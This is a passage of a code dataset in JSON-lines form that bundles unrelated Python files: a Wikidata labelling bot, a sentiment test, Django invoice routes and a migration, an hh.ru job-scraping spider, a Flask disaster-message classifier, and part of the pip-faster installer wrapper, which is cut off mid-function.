START_TIME)\n)\n\nQUERY = (\"\"\"\nSELECT DISTINCT ?item\nWHERE {\n ?item p:{instance_of} ?st .\n ?st ps:{instance_of} wd:{administrative_division} .\n\n OPTIONAL{?st pq:{start_time} ?start_time_date}\n FILTER(IF(BOUND(?start_time_date), ?start_time_date <= \"{today}\"^^xsd:dateTime, true))\n\n OPTIONAL{?st pq:{end_time} ?end_time_date}\n FILTER(IF(BOUND(?end_time_date), ?end_time_date > \"{today}\"^^xsd:dateTime, true))\n}\n\"\"\").replace('{instance_of}', INSTANCE_OF)\\\n .replace('{start_time}', START_TIME)\\\n .replace('{end_time}', END_TIME)\n\n\ndef config_logger(log_filename=''):\n # Set logging level\n logger.setLevel(logging.DEBUG)\n # Create formatter\n formatter = logging.Formatter('%(asctime)s [%(levelname)8s] %(message)s')\n # Create console handler\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n if log_filename:\n # Create file handler\n fh = logging.FileHandler(filename=log_filename, encoding='utf-8')\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"Add ca label and description\")\n parser.add_argument('-t', '--to', default=COMMUNE_NOUVELLE)\n parser.add_argument('--log', default='')\n return parser.parse_args()\n\n\ndef 
update_label_description(item, data, summary_what):\n summary = \" and \".join(summary_what)\n summary = f\"Update ca {summary}\"\n try:\n logger.info(summary)\n item.editEntity(copy.deepcopy(data), summary=summary) # editEntity modifies data\n except OtherPageSaveError:\n logger.warning(f\"Exception while updating item {item.id}\")\n location = item\n instance_of = item.claims[INSTANCE_OF][0].target.id\n iteration = 0\n while instance_of != DEPARTMENT_OF_FRANCE and iteration < 5:\n iteration += 1\n location = location.claims[LOCATED_IN][0].target\n _ = location.get()\n instance_of = location.claims[INSTANCE_OF][0].target.id\n if instance_of != DEPARTMENT_OF_FRANCE:\n raise OtherPageSaveError\n location_ca_label = location.labels.get('ca')\n location_fr_label = location.labels.get('fr')\n ca_description = data['descriptions']['ca'] if 'descriptions' in data else item.descriptions.get('ca')\n ca_description += f\" al departament {DE[TNCC_CA[location_fr_label]]}{location_ca_label}\"\n logger.warning(f\"Retry updating with new description: {ca_description}\")\n ca_description = {'ca': ca_description}\n data['descriptions'] = ca_description\n summary_what = set(summary_what + ['description'])\n summary = \" and \".join(set(summary_what))\n summary = f\"Update ca {summary}\"\n logger.info(summary)\n item.editEntity(copy.deepcopy(data), summary=summary) # editEntity modifies data\n\n\ndef update_replaced_municipalities(item):\n replaced_statements = item.statements.get(REPLACES)\n if not replaced_statements:\n return\n logger.info(\"Start update of replaced municipalities\")\n for statement in replaced_statements:\n replaced_municipality = statement.target\n update_replaced_municipality(replaced_municipality)\n logger.info(\"End update of replaced municipalities\")\n\n\ndef update_replaced_municipality(pwb_item):\n _ = pwb_item.get()\n logger.info(f\"Replaced item: {pwb_item.getID()}\")\n data = {}\n summary_what = []\n\n # Label\n ca_label = pwb_item.labels.get('ca')\n if not ca_label:\n fr_label = pwb_item.labels.get('fr')\n if fr_label:\n ca_label = {'ca': fr_label}\n data['labels'] = ca_label\n summary_what.append('label')\n else:\n logger.error(f\"No fr label for item {pwb_item.id}\")\n else:\n logger.info(f\"ca label already present for item {pwb_item.id}: {ca_label}\")\n\n # Description\n ca_description = pwb_item.descriptions.get('ca')\n if not ca_description:\n ca_description = {'ca': 'antic municipi francès'}\n data['descriptions'] = ca_description\n summary_what.append('description')\n else:\n if ca_description.startswith('municipi'):\n if len(ca_description) > 16:\n logger.warning(f\"ca description longer than expected for item {pwb_item.id}: {ca_description}\")\n ca_description = {'ca': f'antic {ca_description}'}\n data['descriptions'] = ca_description\n summary_what.append('description')\n elif ca_description.startswith('antic'):\n logger.info(f\"ca description already updated for item {pwb_item.id}: {ca_description}\")\n else:\n logger.error(f\"ca description different than expected for item {pwb_item.id}: {ca_description}\")\n fr_description = pwb_item.descriptions.get('fr')\n if not fr_description:\n logger.warning(f\"No fr description for item {pwb_item.id}\")\n elif not fr_description.startswith('ancienne'):\n logger.warning(f\"fr description does not start with 'ancienne' for item {pwb_item.id}: {fr_description}\")\n\n # Update data\n if data:\n # entity = {'id': item.id}\n # response = wikidatabot.repo.editEntity(entity, data, summary=summary)\n # print(response)\n 
update_label_description(pwb_item, data, summary_what)\n\n\nif __name__ == '__main__':\n\n # Parse arguments\n args = parse_args()\n\n # Configurate logger\n config_logger(log_filename=args.log)\n logger.info('START add_ca_label_description')\n\n # Asof: today\n today = str(datetime.date.today())\n\n # Query\n query = QUERY.replace('{administrative_division}', args.to).replace('{today}', today)\n\n # Create item generator\n pwb_items = pg.WikidataSPARQLPageGenerator(query, site=wikidatabot.site)\n # pwb_items = [1]\n\n for i, pwb_item in enumerate(pwb_items):\n # pwb_item = wikidatabot.pywikibot.ItemPage(wikidatabot.repo, 'Q764858')\n # pwb_item = wikidatabot.pywikibot.ItemPage(wikidatabot.repo, 'Q43781672')\n # logger.info(pwb_item)\n pwb_item.get()\n # pwb_item_id = pwb_item.getID()\n logger.info(f\"Item: {pwb_item.getID()}\")\n item = Item.from_pwb(pwb_item)\n\n # Update REPLACES municipalities\n update_replaced_municipalities(item)\n\n data = {}\n summary_what = []\n # Label\n ca_label = item.labels.get('ca')\n if not ca_label:\n fr_label = item.labels.get('fr')\n if fr_label:\n ca_label = {'ca': fr_label}\n data['labels'] = ca_label\n summary_what.append('label')\n else:\n logger.error(f\"No fr label for item {item.id}\")\n else:\n logger.info(f\"ca label already present for item {item.id}: {ca_label}\")\n\n # Description\n ca_description = item.descriptions.get('ca')\n if not ca_description:\n fr_description = item.descriptions.get('fr')\n if not fr_description:\n logger.warning(f\"No fr description for item {item.id}\")\n elif not fr_description.startswith('commune'):\n logger.warning(f\"fr description does not start with 'commune' for item {item.id}: {fr_description}\")\n ca_description = {'ca': 'municipi francès'}\n data['descriptions'] = ca_description\n summary_what.append('description')\n else:\n # TODO:\n logger.info(f\"ca description already present for item {item.id}: {ca_description}\")\n\n # Update data\n if data:\n # entity = {'id': item.id}\n # response = wikidatabot.repo.editEntity(entity, data, summary=summary)\n # print(response)\n update_label_description(pwb_item, data, summary_what)\n\n # if i >= 0:\n # break\n logger.info('END add_ca_label_description')\n","repo_name":"albertvillanova/WikidataBot","sub_path":"scripts/add_ca_label_description.py","file_name":"add_ca_label_description.py","file_ext":"py","file_size_in_byte":11770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75168659044","text":"import pytest\n\nfrom model_loader import get_sentiment\n\n\n@pytest.mark.parametrize(\n \"text, expected_result\",\n [\n (\"Этот город самый лучший город на Земле!\", \"positive\"),\n (\"Этот город самый худший город на Земле!\", \"negative\"),\n (\"This city is the best city on Earth!\", \"positive\"),\n (\"This city is the worst city on Earth!\", \"negative\"),\n (\"Этот город просто обычный город на Земле.\", \"neutral\"),\n (\"This city is just a typical city on Earth.\", \"neutral\"),\n ],\n)\ndef test_neural_net(text, expected_result):\n try:\n res = get_sentiment(text)\n except Exception:\n res = \"error\"\n\n assert res == expected_result\n","repo_name":"pavviaz/itmo_backend_course","sub_path":"hw_3/neural_engine/test_ml.py","file_name":"test_ml.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72887060004","text":"from django.conf.urls import url,include\nfrom . 
import views\n\napp_name = \"invoice\"\n\nupatterns = [\n    url(r'^salesinvoice/(?P<pk>[0-9]+)$',views.UpdateSalesInvoice.as_view(),name='update-salesinvoice'),\n    url(r'^salesreturninvoice/(?P<pk>[0-9]+)$',views.UpdateSalesReturnInvoice.as_view(),name='update-salesreturninvoice'),\n    url(r'^purchasesinvoice/(?P<pk>[0-9]+)$',views.UpdatePurchaseInvoice.as_view(),name='update-purchasesinvoice'),\n    url(r'^purchasesreturninvoice/(?P<pk>[0-9]+)$',views.UpdatePurchaseReturnInvoice.as_view(),name='update-purchasesreturninvoice'),\n]\n\ncpatterns = [\n    url(r'^salesinvoice$',views.CreateSalesInvoice.as_view(),name='create-salesinvoice'),\n    url(r'^salesreturninvoice$',views.CreateSalesReturnInvoice.as_view(),name='create-salesreturninvoice'),\n    url(r'^purchasesinvoice$',views.CreatePurchaseInvoice.as_view(),name='create-purchasesinvoice'),\n    url(r'^purchasesreturninvoice$',views.CreatePurchaseReturnInvoice.as_view(),name='create-purchasesreturninvoice'),\n]\n\nqpatterns = [\n    url(r'^salesinvoices$',views.SalesInvoices.as_view(),name='salesinvoices'),\n    url(r'^salesreturninvoices$',views.SalesReturnInvoices.as_view(),name='salesreturninvoices'),\n    url(r'^purchasesinvoices$',views.PurchaseInvoices.as_view(),name='purchasesinvoices'),\n    url(r'^purchasesreturninvoices$',views.PurchaseReturnInvoices.as_view(),name='purchasesreturninvoices'),\n]\n\nhpatterns = [\n    url(r'^recall/sales$',views.RecallSalesInvoice.as_view()),\n    url(r'^recall/purchases$',views.RecallPurchaseInvoice.as_view()),\n    url(r'^recall/salesreturns$',views.RecallSalesReturnInvoice.as_view()),\n    url(r'^recall/purchasesreturns$',views.RecallPurchaseReturnInvoice.as_view()),\n    url(r'^void/purchasesinvoice$',views.VoidPurchaseInvoice.as_view()),\n    url(r'^void/purchasesreturninvoice$',views.VoidPurchaseReturnInvoice.as_view()),\n    url(r'^void/salesinvoice$',views.VoidSalesInvoice.as_view()),\n    url(r'^void/salesreturninvoice$',views.VoidSalesReturnInvoice.as_view()),\n    url(r'^pay/salesinvoice$',views.PaySalesInvoice.as_view()),\n    url(r'^pay/purchasesinvoice$',views.PayPurchaseInvoice.as_view()),\n]\n\napiv1 = [\n    url(r'^update/',include(upatterns)),\n    url(r'^helpers/',include(hpatterns)),\n    url(r'^create/',include(cpatterns)),\n    url(r'^query/',include(qpatterns)),\n]\n\nurlpatterns = [\n    url(r'^$',views.AppInit.as_view(),name=\"index\"),\n    url(r'^apiv1/',include(apiv1)),\n]\n","repo_name":"baahkusi/caretaker","sub_path":"invoice/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"10466425358","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('official_account', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='SimulationMatch',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('openid', models.CharField(max_length=50, verbose_name='\\u7528\\u6237OpenID')),\n                ('fakeid', models.CharField(max_length=50, verbose_name='\\u7528\\u6237FakeID')),\n                ('official_account', models.ForeignKey(verbose_name='\\u6240\\u5c5e\\u516c\\u4f17\\u53f7', to='official_account.OfficialAccount')),\n            ],\n            options={\n                'db_table': 'simulation_match',\n                'verbose_name': '\\u6a21\\u62df\\u767b\\u9646\\u5173\\u7cfb\\u5bf9\\u5e94\\u8868',\n                'verbose_name_plural': '\\u6a21\\u62df\\u767b\\u9646\\u5173\\u7cfb\\u5bf9\\u5e94\\u8868',\n            },\n            
bases=(models.Model,),\n ),\n ]\n","repo_name":"doraemonext/wechat-platform","sub_path":"wechat_platform/system/simulation/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"52"} +{"seq_id":"12637215009","text":"import scrapy\nfrom scrapy.http import HtmlResponse\nfrom items import JobparserItem\n\n\ndef vacancy_parse(response: HtmlResponse):\n company_name = response.xpath(\n \"//div[contains(@class, 'bloko-column_m-0 bloko-column_l-6')]//span[@data-qa='bloko-header-2']//text()\").getall()\n vacancies_name = response.xpath(\"//h1/text()\").get()\n salary = response.xpath(\"//div[@data-qa='vacancy-salary']//text()\").getall()\n url = response.url\n _id = response.url\n yield JobparserItem(company_name=company_name, vacancies_name=vacancies_name, salary=salary, url=url, _id=_id)\n\n\nclass HhRuSpider(scrapy.Spider):\n name = 'hh_ru'\n allowed_domains = ['hh.ru']\n\n start_urls = [\n 'https://krasnodar.hh.ru/vacancies/python-developer']\n\n def parse(self, response):\n next_page = response.xpath(\"//a[@data-qa='pager-next']/@href\").get()\n if next_page:\n yield response.follow(next_page, callback=self.parse)\n links = response.xpath(\"//a[@data-qa='serp-item__title']/@href\").getall()\n for link in links:\n yield response.follow(link, method='GET', callback=vacancy_parse)\n","repo_name":"nezl0i/gb_outside","sub_path":"5/jobparser/spiders/hh_ru.py","file_name":"hh_ru.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16389084445","text":"import sys\nimport os\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nimport json\nimport plotly\nimport re\nimport pandas as pd\nimport numpy as np\nimport nltk\n\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\n\nfrom flask import Flask\nfrom flask import render_template, request, jsonify\nfrom plotly.graph_objs import Bar\nfrom sklearn.externals import joblib\nfrom sqlalchemy import create_engine\n\nfrom nlp_utils import NLPUtils\n\nnltk.download('stopwords')\n\napp = Flask(__name__)\nnlpUtils = NLPUtils()\n\n# load model\nmodel = joblib.load(\"../models/classifier.pkl\")\nfeatures_corpus = pd.read_csv('../data/features_corpus.csv')\n# Dataset categories\ncolumns = ['related', 'request', 'offer',\n 'aid_related', 'medical_help', 'medical_products',\n 'search_and_rescue', 'security', 'military', 'child_alone', 'water',\n 'food', 'shelter', 'clothing', 'money', 'missing_people',\n 'refugees', 'death', 'other_aid', 'infrastructure_related',\n 'transport', 'buildings', 'electricity', 'tools', 'hospitals',\n 'shops', 'aid_centers', 'other_infrastructure', 'weather_related',\n 'floods', 'storm', 'fire', 'earthquake', 'cold', 'other_weather',\n 'direct_report', 'genre_direct', 'genre_news', 'genre_social']\n\n# CSS class icons for categories\ncategory_icons = {\n 'related':'exclamation-triangle', 'request':'hand-point-up', 'offer':'hand-holding-heart',\n 'aid_related':'first-aid', 'medical_help':'briefcase-medical', 'medical_products':'prescription-bottle-alt',\n 'search_and_rescue':'helicopter', 'security':'shield-alt', 'military':'exclamation-circle', 'child_alone':'child',\n 'water':'tint', 'food':'utensils', 'shelter':'home', 'clothing':'tshirt', 
'money':'hand-holding-usd',\n    'missing_people':'user-minus', 'refugees':'user-friends', 'death':'user-times', 'other_aid':'hands-helping',\n    'infrastructure_related':'house-damage', 'transport':'bus-alt', 'buildings':'building', 'electricity':'bolt',\n    'tools':'tools', 'hospitals':'hospital', 'shops':'shopping-basket', 'aid_centers':'clinic-medical',\n    'other_infrastructure':'city', 'weather_related':'cloud-sun-rain',\n    'floods':'water', 'storm':'cloud-showers-heavy', 'fire':'burn', 'earthquake':'house-damage',\n    'cold':'icicles', 'other_weather':'cloud-sun',\n    'direct_report':'table', 'genre_direct':'mobile', 'genre_news':'newspaper', 'genre_social':'twitter'\n}\n\n# CSS class for category colors\ncategory_colors = {\n    'related':'primary', 'request':'info', 'offer':'success',\n    'aid_related':'danger', 'medical_help':'warning', 'medical_products':'info',\n    'search_and_rescue':'primary', 'security':'info', 'military':'success', 'child_alone':'danger',\n    'water':'warning', 'food':'info', 'shelter':'primary', 'clothing':'info', 'money':'success',\n    'missing_people':'danger', 'refugees':'warning', 'death':'info', 'other_aid':'primary',\n    'infrastructure_related':'info', 'transport':'success', 'buildings':'danger', 'electricity':'warning',\n    'tools':'info', 'hospitals':'primary', 'shops':'info', 'aid_centers':'success',\n    'other_infrastructure':'danger', 'weather_related':'warning',\n    'floods':'info', 'storm':'primary', 'fire':'info', 'earthquake':'success',\n    'cold':'danger', 'other_weather':'warning',\n    'direct_report':'info', 'genre_direct':'primary', 'genre_news':'info', 'genre_social':'success'\n}\n\n# Set random colors for category plots\nimport random as random\nbackgroundColors = []\nborderColors = []\nfor category in columns:\n    r = random.randint(0, 255)\n    g = random.randint(0, 255)\n    b = random.randint(0, 255)\n    backgroundColors.append( \"rgba({}, {}, {}, 0.2)\".format(r, g, b))\n    borderColors.append( \"rgb({}, {}, {})\".format(r, g, b))\n\n# index webpage displays cool visuals and receives user input text for model\n@app.route('/')\n@app.route('/index')\ndef index():\n    \"\"\"\n    Results are shown in a table and a plot to show the predicted categories.\n    \"\"\"\n    query = request.args.get('query', '')\n    classification_results = None\n    categories = None\n    categories_totals = None\n\n    if(query != ''):\n        # use model to predict classification for query; keep the raw query\n        # string so it can be rendered and stored alongside the prediction\n        query_df = pd.DataFrame([query], columns=['document'])\n        print(f'query_df: {query_df}')\n        query_vec = nlpUtils.vectorize(query_df['document'], features_corpus)\n        classification_labels = model.predict(query_vec)[0]\n        print(f'classification_labels: {classification_labels}')\n        classification_results = dict(zip(columns, classification_labels))\n\n        columns_df = ['message']\n        columns_df.extend(columns)\n\n        messages_df = pd.DataFrame(columns = columns_df)\n        messages_df = messages_df.append(classification_results, ignore_index = True)\n        messages_df['message'] = query\n\n        categories, categories_totals = get_plot_params(messages_df, True)\n\n        store_message(query, messages_df)\n    return render_template(\n        'index.html',\n        query=query,\n        classification_result=classification_results,\n        categories = categories,\n        categories_totals = categories_totals,\n        background_colors = backgroundColors,\n        border_colors = borderColors\n    )\n\ndef store_message(message, messages_df):\n    \"\"\"Every query is stored in a table with the predicted categories. This can eventually allow users to
This can eventually allow users to\n manually make correction to classifications that can be used to expand the training set.\n\n Parameters\n ----------\n message: string\n Message to classify.\n\n messages_df: DataFrame\n Dataframe with the predicted categories for the message.\n \"\"\"\n engine = create_engine('sqlite:///ReceivedMessages.db')\n exists = 0\n try:\n messages = pd.read_sql_table('messages', engine)\n exists = messages.loc[messages['message'] == message].shape[0]\n except Exception as inst:\n print(\"Unexpected error:\", inst)\n pass\n if(exists == 0):\n messages_df.to_sql('messages', engine, index=False, if_exists='append')\n\ndef get_plot_params(messages, filter = False):\n \"\"\" Returns parameter values for build a chartjs plot\n\n Parameters\n ----------\n messages: DataFrame\n DataFrame with messages and their predicted categories.\n\n filter: bool\n If True, only returns categories with value 1.\n\n Returns\n -------\n categories: array\n Ids for predicted categories.\n categories_totals: array\n Total of records per categories.\n \"\"\"\n categories_df = messages.drop(['message'], axis = 1)\n totals = categories_df.sum()\n\n categories_totals_df = pd.DataFrame({'category':totals.index, 'total':totals.values})\n if(filter == True):\n categories_totals_df = categories_totals_df.loc[categories_totals_df['total'] > 0]\n categories = list(categories_totals_df['category'].values)\n categories_totals = list(categories_totals_df['total'].values)\n return categories, categories_totals\n\ndef get_top_categories(messages, top):\n \"\"\" Return the most required categories\n\n Parameters\n ----------\n messages: DataFrame\n DataFrame with messages and their predicted categories.\n\n top: int\n Number of categories to retrieve.\n\n Returns\n -------\n categories_totals_df: DataFrame\n Dataframe with the most required categories.\n \"\"\"\n categories_df = messages.drop(['message'], axis = 1)\n totals = categories_df.sum()\n\n categories_totals_df = pd.DataFrame({'category':totals.index, 'total':totals.values})\n return categories_totals_df.sort_values(by=['total'], ascending = False).head(n = top)\n\n@app.route('/dashboard')\ndef dashboard():\n \"\"\"\n This page provides basic plotting information from the messages received and their classifications.\n \"\"\"\n engine = create_engine('sqlite:///ReceivedMessages.db')\n categories_top_df = pd.DataFrame()\n categories_totals_df = pd.DataFrame()\n categories = None\n categories_totals = None\n\n try:\n received_messages = pd.read_sql_table('messages', engine)\n categories, categories_totals = get_plot_params(received_messages)\n categories_top_df = get_top_categories(received_messages, 4)\n\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n pass\n return render_template(\n 'dashboard.html',\n categories_top_df = categories_top_df,\n category_icons = category_icons,\n category_colors = category_colors,\n categories = categories,\n categories_totals = categories_totals,\n background_colors = backgroundColors,\n border_colors = borderColors\n )\n\n@app.route('/dataset')\ndef dataset():\n return render_template(\n 'dataset.html'\n )\n\n\ndef main():\n app.run(host='0.0.0.0', port=3001, debug=True)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mrugeles/Disaster-Response-Pipeline","sub_path":"app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42805384867","text":"#!/usr/bin/env 
python\n# -*- coding: utf-8 -*-\n'''pip-faster is a thin wrapper around pip.\n\nIt only adds a --prune option to the `install` subcommand.\n`pip-faster install --prune` will *uninstall* any installed packages that are\nnot required.\n\nOtherwise, you should find that pip-faster gives the same results as pip, just\nmore quickly, especially in the case of pinned requirements (e.g.\npackage-x==1.2.3).\n\nVersion control at: https://github.com/yelp/venv-update\n'''\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport errno\nimport glob\nimport os\nimport random\nimport re\nimport shutil\nimport sys\nfrom contextlib import contextmanager\n\nimport pip as pipmodule\nfrom pip._internal import logger\nfrom pip._internal.commands.install import InstallCommand\nfrom pip._internal.exceptions import DistributionNotFound\nfrom pip._internal.exceptions import InstallationError\nfrom pip._internal.index import BestVersionAlreadyInstalled\nfrom pip._internal.index import HTMLPage\nfrom pip._internal.index import Link\nfrom pip._internal.index import PackageFinder\nfrom pip._internal.req import InstallRequirement\nfrom pip._internal.wheel import Wheel\n\nfrom venv_update import colorize\nfrom venv_update import raise_on_failure\nfrom venv_update import timid_relpath\nfrom venv_update import user_cache_dir\n\n# Debian de-vendorizes the version of pip it ships\ntry: # :pragma:nocover: non-debian\n from pip._vendor import pkg_resources\nexcept ImportError: # :pragma:nocover: debian\n import pkg_resources\n\ntry: # :pragma:nocover: pip>=18.1\n from pip._internal.req.constructors import install_req_from_line\nexcept ImportError: # :pragma:nocover: pip<18.1\n install_req_from_line = InstallRequirement.from_line\n\n# Thanks six!\nPY2 = str is bytes\nif PY2: # :pragma:nocover:\n _reraise_src = 'def reraise(tp, value, tb=None): raise tp, value, tb'\n exec(_reraise_src)\nelse: # :pragma:nocover:\n def reraise(tp, value, tb=None):\n if value is None:\n value = tp()\n if value.__traceback__ is not tb:\n raise value.with_traceback(tb)\n raise value\n\n\nclass CACHE(object):\n _cache_dir = user_cache_dir()\n wheelhouse = os.path.join(_cache_dir, 'pip-faster', 'wheelhouse')\n pip_wheelhouse = os.path.join(_cache_dir, 'pip', 'wheels')\n\n\ndef ignorecase_glob(glob):\n return ''.join([\n '[{}{}]'.format(char.lower(), char.upper())\n if char.isalpha() else char\n for char in glob\n ])\n\n\ndef optimistic_wheel_search(req, index_urls):\n name = req.name.replace('-', '_').lower()\n\n for index_url in index_urls:\n expected_location = os.path.join(\n CACHE.wheelhouse, index_url, ignorecase_glob(name) + '-*.whl',\n )\n for link in glob.glob(expected_location):\n link = Link('file:' + link)\n wheel = Wheel(link.filename)\n if req.specifier.contains(wheel.version) and wheel.supported():\n return link\n\n\ndef is_req_pinned(requirement):\n if not requirement:\n # url-style requirement\n return False\n\n for spec in requirement.specifier:\n if spec.operator == '==' and not spec.version.endswith('.*'):\n return True\n return False\n\n\nclass FasterPackageFinder(PackageFinder):\n\n def find_requirement(self, req, upgrade):\n if is_req_pinned(req.req):\n # if the version is pinned-down by a ==\n # first try to use any installed package that satisfies the req\n if req.satisfied_by:\n logger.info('Faster! 
pinned requirement already installed.')\n raise BestVersionAlreadyInstalled\n\n # then try an optimistic search for a .whl file:\n link = optimistic_wheel_search(req.req, self.index_urls)\n if link is None:\n # The wheel will be built during prepare_files\n logger.debug('No wheel found locally for pinned requirement %s', req)\n else:\n logger.info('Faster! Pinned wheel found, without hitting PyPI.')\n return link\n else:\n # unpinned requirements aren't very notable. only show with -v\n logger.info('slow: full search for unpinned requirement %s', req)\n\n # otherwise, do the full network search, per usual\n try:\n return super(FasterPackageFinder, self).find_requirement(req, upgrade)\n except DistributionNotFound:\n exc_info = sys.exc_info()\n # Best effort: try and install from suitable version on-disk\n link = optimistic_wheel_search(req.req, self.index_urls)\n if link:\n return link\n else:\n reraise(*exc_info)\n\n\ndef _can_be_cached(package):\n return (\n package.is_wheel and\n # An assertion that we're looking in the pip wheel dir\n package.link.path.startswith(CACHE.pip_wheelhouse)\n )\n\n\ndef mkdirp(pth):\n try:\n os.makedirs(pth)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\n\ndef _store_wheel_in_cache(file_path, index_url):\n filename = os.path.basename(file_path)\n cache = os.path.join(CACHE.wheelhouse, index_url, filename)\n cache_tmp = '{}.{}'.format(cache, random.randint(0, sys.maxsize))\n cache_dir = os.path.dirname(cache)\n mkdirp(cache_dir)\n # Atomicity\n shutil.copy(file_path, cache_tmp)\n os.rename(cache_tmp, cache)\n\n\ndef cache_installed_wheels(index_url, installed_packages):\n \"\"\"After installation, pip tells us what it installed and from where.\n\n We build a structure that looks like\n\n .cache/pip-faster/wheelhouse/$index_url/$wheel\n \"\"\"\n for installed_package in installed_packages:\n if not _can_be_cached(installed_package):\n continue\n _store_wheel_in_cache(installed_package.link.path, index_url)\n\n\ndef get_patched_download_http_url(orig_download_http_url, index_urls):\n def pipfaster_download_http_url(link, *args, **kwargs):\n file_path, content_type = orig_download_http_url(link, *args, **kwargs)\n if link.is_wheel:\n for index_url in index_urls:\n if (\n # pip <18.1\n isinstance(link.comes_from, HTMLPage) and\n link.comes_from.url.startswith(index_url)\n ) or (\n # pip >= 18.1\n isinstance(link.comes_from, (str, type(''))) and\n link.comes_from.startswith(index_url)\n ):\n _store_wheel_in_cache(file_path, index_url)\n break\n return file_path, content_type\n return pipfaster_download_http_url\n\n\ndef pip(args):\n \"\"\"Run pip, in-process.\"\"\"\n from sys import stdout\n stdout.write(colorize(('pip',) + args))\n stdout.write('\\n')\n stdout.flush()\n\n return pipmodule._internal.main(list(args))\n\n\ndef dist_to_req(dist):\n \"\"\"Make a pip.FrozenRequirement from a pkg_resources distribution object\"\"\"\n try: # :pragma:nocover: (pip>=10)\n from pip._internal.operations.freeze import FrozenRequirement\n except ImportError: # :pragma:nocover: (pip<10)\n from pip import FrozenRequirement\n\n # normalize the casing, dashes in the req name\n orig_name, dist.project_name = dist.project_name, dist.key\n result = FrozenRequirement.from_dist(dist, [])\n # put things back the way we found it.\n dist.project_name = orig_name\n\n return result\n\n\ndef pip_get_installed():\n \"\"\"Code extracted from the middle of the pip freeze command.\n FIXME: does not list anything installed via -e\n \"\"\"\n from pip._internal.utils.misc import 
dist_is_local\n\n return tuple(\n dist_to_req(dist)\n for dist in fresh_working_set()\n if dist_is_local(dist)\n if dist.key != 'python' # See #220\n )\n\n\ndef normalize_name(name):\n \"\"\"Normalize a python package name a la PEP 503\"\"\"\n # https://www.python.org/dev/peps/pep-0503/#normalized-names\n return re.sub('[-_.]+', '-', name).lower()\n\n\ndef fresh_working_set():\n \"\"\"return a pkg_resources \"working set\", representing the *currently* installed packages\"\"\"\n class WorkingSetPlusEditableInstalls(pkg_resources.WorkingSet):\n\n def __init__(self, *args, **kwargs):\n self._normalized_name_mapping = {}\n super(WorkingSetPlusEditableInstalls, self).__init__(*args, **kwargs)\n\n def add_entry(self, entry):\n \"\"\"Same as the original .add_entry, but sets only=False, so that egg-links are honored.\"\"\"\n logger.debug('working-set entry: %r', entry)\n self.entry_keys.setdefault(entry, [])\n self.entries.append(entry)\n for dist in pkg_resources.find_distributions(entry, False):\n\n # eggs override anything that's installed normally\n # fun fact: pkg_resources.working_set's results depend on the\n # ordering of os.listdir since the order of os.listdir is\n # entirely arbitrary (an implemenation detail of file system),\n # without calling site.main(), an .egg-link file may or may not\n # be honored, depending on the filesystem\n replace = (dist.precedence == pkg_resources.EGG_DIST)\n self._normalized_name_mapping[normalize_name(dist.key)] = dist.key\n self.add(dist, entry, False, replace=replace)\n\n def find_normalized(self, req):\n req = _package_req_to_pkg_resources_req(str(req))\n req.key = self._normalized_name_mapping.get(normalize_name(req.key), req.key)\n return self.find(req)\n\n return WorkingSetPlusEditableInstalls()\n\n\ndef req_cycle(req):\n \"\"\"is this requirement cyclic?\"\"\"\n cls = req.__class__\n seen = {req.name}\n while isinstance(req.comes_from, cls):\n req = req.comes_from\n if req.name in seen:\n return True\n else:\n seen.add(req.name)\n return False\n\n\ndef pretty_req(req):\n \"\"\"\n return a copy of a pip requirement that is a bit more readable,\n at the expense of removing some of its data\n \"\"\"\n from copy import copy\n req = copy(req)\n req.link = None\n req.satisfied_by = None\n return req\n\n\ndef _package_req_to_pkg_resources_req(req):\n return pkg_resources.Requirement.parse(str(req))\n\n\ndef trace_requirements(requirements):\n \"\"\"given an iterable of pip InstallRequirements,\n return the set of required packages, given their transitive requirements.\n \"\"\"\n requirements = tuple(pretty_req(r) for r in requirements)\n working_set = fresh_working_set()\n\n # breadth-first traversal:\n from collections import deque\n queue = deque(requirements)\n queued = {_package_req_to_pkg_resources_req(req.req) for req in queue}\n errors = []\n result = []\n while queue:\n req = queue.popleft()\n\n logger.debug('tracing: %s', req)\n try:\n dist = working_set.find_normalized(_package_req_to_pkg_resources_req(req.req))\n except pkg_resources.VersionConflict as conflict:\n dist = conflict.args[0]\n errors.append('Error: version conflict: {} ({}) <-> {}'.format(\n dist, timid_relpath(dist.location), req\n ))\n\n assert dist is not None, 'Should be unreachable in pip8+'\n result.append(dist_to_req(dist))\n\n # TODO: pip does no validation of extras. 
